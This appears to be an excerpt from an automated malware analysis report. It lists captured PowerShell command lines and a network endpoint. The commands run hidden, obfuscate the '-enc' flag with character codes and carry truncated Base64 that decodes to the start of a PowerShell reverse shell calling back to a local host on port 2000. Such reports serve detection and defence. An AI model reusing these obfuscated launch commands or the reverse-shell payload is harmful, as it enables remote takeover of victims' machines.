Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) JABjAGwAaQBlAG4AdAAgAD0AIAAkAHMAdAByAGUAYQBtACAAPQAgACQAYgB1AGYAZgBlAHIAIAA9ACAAJAB3AHIAaQB0AGUAcgAgAD0AIAAkAGQAYQB0AGEAIAA9ACAAJAByAG...
- '<LOCALNET>.1.102':2000
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) JABjAGwAaQBlAG4AdAAgAD0AIAAkAHMAdAByAGUAYQBtACAAPQAgACQAYgB1AGYAZgBlAHIAIAA9ACAAJAB3AHIAaQB0AGUAcgAgAD0AIAAkAGQAYQB0AGEAIAA9ACAAJAByAG...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABjAGwAaQBlAG4AdAAgAD0AIAAkAHMAdAByAGUAYQBtACAAPQAgACQAYgB1AGYAZgBlAHIAIAA9ACAAJAB3AHIAaQB0AGUAcgAgAD0AIAAkAGQAYQB0AGEAIAA9ACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAG4AdQBsAGwAOwAKAAkAJABjAGwAaQBl...